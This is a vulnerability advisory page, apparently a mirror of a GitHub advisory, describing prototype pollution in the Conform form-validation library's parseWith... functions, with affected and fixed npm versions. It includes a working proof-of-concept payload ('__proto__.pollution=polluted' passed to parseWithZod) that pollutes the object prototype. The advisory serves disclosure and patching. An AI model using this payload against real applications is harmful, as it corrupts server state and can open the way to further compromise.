Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-624g-8qjg-8qxf

Опубликовано: 23 апр. 2024
Источник: github
Github: Прошло ревью
CVSS3: 8.6

Описание

Conform contains a Prototype Pollution Vulnerability in parseWith... function

Summary

Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith... functions.

PoC

const { parseWithZod } = require('@conform-to/zod'); const { z } = require("zod"); const param = new URLSearchParams("__proto__.pollution=polluted"); const schema = z.object({ "a": z.string() }); parseWithZod(param, { schema }); console.log("pollution:", ({}).pollution); // should print "polluted"

Details

The invocation of the parseWithZod function in the above PoC triggers the setValue function through getSubmissionContext and parse, executing the following process, resulting in prototype pollution:

let pointer = value; pointer.__proto__ = pointer.__proto__; pointer = pointer.__proto__; pointer.polluted = "polluted";

This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key] without proper validation.

Impact

Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

Пакеты

Наименование

@conform-to/dom

npm
Затронутые версииВерсия исправления

>= 1.0.0, <= 1.1.0

1.1.1

Наименование

@conform-to/zod

npm
Затронутые версииВерсия исправления

>= 1.0.0, <= 1.1.0

1.1.1

Наименование

@conform-to/yup

npm
Затронутые версииВерсия исправления

>= 1.0.0, <= 1.1.0

1.1.1

Наименование

@conform-to/zod

npm
Затронутые версииВерсия исправления

< 0.9.2

0.9.2

Наименование

@conform-to/yup

npm
Затронутые версииВерсия исправления

< 0.9.2

0.9.2

Наименование

@conform-to/dom

npm
Затронутые версииВерсия исправления

< 0.9.2

0.9.2

EPSS

Процентиль: 35%
0.00142
Низкий

8.6 High

CVSS3

Дефекты

CWE-1321

Связанные уязвимости

CVSS3: 8.6
nvd
почти 2 года назад

Conform, a type-safe form validation library, allows the parsing of nested objects in the form of `object.property`. Due to an improper implementation of this feature in versions prior to 1.1.1, an attacker can exploit the feature to trigger prototype pollution by passing a crafted input to `parseWith...` functions. Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability. Version 1.1.1 contains a patch for the issue.

EPSS

Процентиль: 35%
0.00142
Низкий

8.6 High

CVSS3

Дефекты

CWE-1321